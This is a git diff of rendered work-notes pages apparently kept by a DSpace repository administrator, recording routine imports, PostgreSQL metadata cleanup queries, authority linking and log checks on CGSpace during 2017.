    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit"
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
     $ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
    @@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
     
  • The -XX:-UseGCOverheadLimit JVM option helps with some issues in large imports
  • After this I ran the update-sequences.sql script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     

    2017-05-13

    • After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually NUL characters in the dc.description.abstract field (at least) on the lines where CSV importing was failing
    • @@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • Merge changes to CCAFS project identifiers and flagships: #320
    • Run updates for CCAFS flagships on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
     
    • These include:

      @@ -258,7 +258,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
      • Looking into the error I get when trying to create a new collection on DSpace Test:
      -
      ERROR: duplicate key value violates unique constraint "handle_pkey" Detail: Key (handle_id)=(84834) already exists.
      +
      ERROR: duplicate key value violates unique constraint "handle_pkey" Detail: Key (handle_id)=(84834) already exists.
       
      • I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn’t helped
      • It appears item with handle_id 84834 is one of the imported CGIAR Library items:
      • @@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
      • I’ve posted on the dspace-test mailing list to see if I can just manually set the handle_seq to that value
      • Actually, it seems I can manually set the handle sequence using:
      -
      dspace=# select setval('handle_seq',86873);
      +
      dspace=# select setval('handle_seq',86873);
       
      • After that I can create collections just fine, though I’m not sure if it has other side effects
      @@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
    • Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested
    • Peter wanted a list of authors in here, so I generated a list of collections using the “View Source” on each community and this hacky awk:
    -
    $ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3"/"$4}' | awk -F\" '{print $1}' | vim -
    +
    $ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3"/"$4}' | awk -F\" '{print $1}' | vim -
     
    • Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:
    dspace=# select distinct text_value
     from metadatavalue
    -where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
    +where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
     AND resource_type_id = 2
    -AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
    -0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
    -47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
    -/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
    -/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
    -'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
    -47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
    -531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
    -, '10947/2537', '10568/93761')));
    +AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
    +0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
    +47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
    +/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
    +/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
    +'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
    +47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
    +531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
    +, '10947/2537', '10568/93761')));
     
    • To get a CSV (with counts) from that:
    dspace=# \copy (select distinct text_value, count(*)
     from metadatavalue
    -where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
    +where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
     AND resource_type_id = 2
    -AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
    +AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
     

    2017-05-23

    • Add Affiliation to filters on Listing and Reports module (#325)
    • @@ -343,21 +343,21 @@ COPY 111
    • Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the June, 2017 DCAT meeting
    • Find all of Amos Omore’s author name variations so I can link them to his authority entry that has an ORCID:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
     
    • Set the authority for all variations to one containing an ORCID:
    -
    dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
    +
    dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
     UPDATE 187
     
    • Next I need to do Edgar Twine:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
     
    • But it doesn’t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via “Edit this Item” and looked up his ORCID and linked it there
    • Now I should be able to set his name variations to the new authority:
    -
    dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
    +
    dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
     
    • Run the corrections on CGSpace and then update discovery / authority
    • I notice that there are a handful of java.lang.OutOfMemoryError: Java heap space errors in the Catalina logs on CGSpace, I should go look into that…
    • diff --git a/docs/2017-06/index.html b/docs/2017-06/index.html index 07dd02fd1..0c8128402 100644 --- a/docs/2017-06/index.html +++ b/docs/2017-06/index.html @@ -18,7 +18,7 @@ - + @@ -133,7 +133,7 @@
    • dc.format.extent: value.replace("p. ", "").split("-")[1].toNumber() - value.replace("p. ", "").split("-")[0].toNumber()
    -
  • Finally, after some filtering to see which small outliers there were (based on dc.format.extent using “p. 1-14” vs “29 p."), create a new column with last page number: +
  • Finally, after some filtering to see which small outliers there were (based on dc.format.extent using “p. 1-14” vs “29 p.”), create a new column with last page number:
    • cells["dc.page.from"].value.toNumber() + cells["dc.format.pages"].value.toNumber()
    @@ -153,7 +153,7 @@
  • 17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF
  • I’ve flagged them and proceeded without them (752 total) on DSpace Test:
  • -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
     
    • I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)
    • Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT
    • @@ -213,15 +213,15 @@
    • Finally import 914 CIAT Book Chapters to CGSpace in two batches:
    -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    -$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &> /tmp/ciat-books2.log
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    +$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &> /tmp/ciat-books2.log
     

    2017-06-25

    • WLE has said that one of their Phase II research themes is being renamed from Regenerating Degraded Landscapes to Restoring Degraded Landscapes
    • Pull request with the changes to input-forms.xml: #329
    • As of now it doesn’t look like there are any items using this research theme so we don’t need to do any updates:
    -
    dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
    +
    dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
      text_value
     ------------
     (0 rows)
    diff --git a/docs/2017-07/index.html b/docs/2017-07/index.html
    index 17eaeec8f..7b7766730 100644
    --- a/docs/2017-07/index.html
    +++ b/docs/2017-07/index.html
    @@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
     Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
     We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
     "/>
    -
    +
     
     
         
    @@ -132,7 +132,7 @@ We can use PostgreSQL’s extended output format (-x) plus sed to format the
     
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • -
    $ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::'
    +
    $ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::'
     
    • The sed script is from a post on the PostgreSQL mailing list
    • Abenet says the ILRI board wants to be able to have “lead author” for every item, so I’ve whipped up a WIP test in the 5_x-lead-author branch
    • @@ -151,7 +151,7 @@ We can use PostgreSQL’s extended output format (-x) plus sed to format the
    • Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (#330)
    • Generate list of fields in the current CGSpace cg scheme so we can record them properly in the metadata registry:
    -
    $ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::' > cg-types.xml
    +
    $ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::' > cg-types.xml
     
    • CGSpace was unavailable briefly, and I saw this error in the DSpace log file:
    @@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
    • Move two top-level communities to be sub-communities of ILRI Projects
    -
    $ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child="$community"; done
    +
    $ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child="$community"; done
     
    • Discuss CGIAR Library data cleanup with Sisay and Abenet
    @@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
    • Looks like the final list of metadata corrections for CCAFS project tags will be:
    -
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    -update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    -update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    +
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    +update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    +update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
     
    • Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list
    • Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations
    • Looking at CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grep it)!
    -
    $ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
    +
    $ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
     52
     
    • From looking at the dspace.log I see they are all using the same session, which means our Crawler Session Manager Valve is working
    • diff --git a/docs/2017-08/index.html b/docs/2017-08/index.html index 3f3cb4904..f3a873921 100644 --- a/docs/2017-08/index.html +++ b/docs/2017-08/index.html @@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet "/> - + @@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
    • I need to get an author list from the database for only the CGIAR Library community to send to Peter
    • It turns out that I had already used this SQL query in May, 2017 to get the authors from CGIAR Library:
    -
    dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
    +
    dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
     
    • Meeting with Peter and CGSpace team
        @@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
      • I sent a message to the mailing list about the duplicate content issue with /rest and /bitstream URLs
      • Looking at the logs for the REST API on /rest, it looks like there is someone hammering doing testing or something on it…
      -
      # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
      +
      # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
           140 66.249.66.91
           404 66.249.66.90
          1479 50.116.102.77
      @@ -270,9 +270,9 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
       
      • There were only three deletions so I just did them manually:
      -
      dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
      +
      dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
       DELETE 1
      -dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
      +dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
       
      • Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done
      • Thinking about resource limits for PostgreSQL again after last week’s CGSpace crash and related to a recently discussion I had in the comments of the April, 2017 DCAT meeting notes
      • @@ -324,22 +324,22 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
      • And actually, we can do it for other generic fields for items in those collections, for example dc.description.abstract:
      -
      dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
      +
      dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
       
      • And on others like dc.language.iso, dc.relation.ispartofseries, dc.type, dc.title, etc…
      • Also, to move fields from dc.identifier.url to cg.identifier.url[en_US] (because we don’t use the Dublin Core one for some reason):
      -
      dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
      +
      dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
       UPDATE 15
       
      • Set the text_lang of all dc.identifier.uri (Handle) fields to be NULL, just like default DSpace does:
      -
      dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
      +
      dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
       UPDATE 4248
       
      • Also update the text_lang of dc.contributor.author fields for metadata in these collections:
      -
